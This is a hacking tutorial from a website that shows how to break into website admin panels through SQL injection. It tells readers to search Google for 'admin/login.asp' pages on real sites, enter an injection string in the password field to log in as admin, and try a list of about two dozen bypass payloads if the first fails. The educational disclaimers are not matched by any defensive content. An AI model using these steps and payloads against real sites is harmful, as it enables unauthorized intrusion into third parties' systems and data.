Hack Website Admin Account | Basic SQL Injection Attack

SQL Injection Exploiting Login form

Hack Website Admin Account | Basic SQL Injection Attack

 The articles contained on the website are for educational purposes only encouraging users and Admins to better understand the environmental security measurement and enable safer digital environment.
Geek-KB.com does not encourage, condone, or orchestrate attempts of hacking into other servers or any other illegal activities. All actions taken by users are strictly independent of Geek-KB.com. We are not responsible for any misuse of the techniques listed on this website.
2. Geek-KB.com has the sole discretion to remove/edit users, articles, external resources, or any other user-submitted content to protect itself from legal harm. This legal disclaimer may be modified at any time without notice.
3. Any damage caused by using any of the techniques taken from http://geek-kb.com is at your own risk and responsibility;



Basic SQL Injection Attack

from Wikipedia:
SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).[1] SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
in an sql injection we attack the sql database used in many asp websites.
1. Go to Google, type in ”admin/login.asp” and search (You can also use the option, to search only in your country).
Hack Website
As you already can see in the first picture, we are looking for websites that look like this: example ”google.com/admin/login.asp”.
2. Go to the website admin login page, type in:
Username : admin
Password : 1′or’1′=’1
SQL injection
Well done!! Your now logged in as ADMIN:
SQL injection
If it’s not working, I’ve listed other possible injections below. Type these in the ”Password” field.
List of injections:
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
I hope you liked this article, please feel free to leave comments or ask questions.
1. Geek-KB.com does not encourage, condone, or orchestrate attempts to hack into other servers or any other illegal activities. The articles contained inside this website are for entertainment / educational purposes only, and what actions people decide to take outside of this website are strictly independent of Geek-KB.com. We are not responsible if you break the law using techniques listed on this website.
2. Geek-KB.com has the sole discretion to remove/edit users, articles, external resources, or any other user-submitted content to protect itself from legal harm. This legal disclaimer may be modified at any time without notice.
3. Any damage caused by using any of the techniques taken from http://geek-kb.com is on your own responsibility, Use it at your own risk!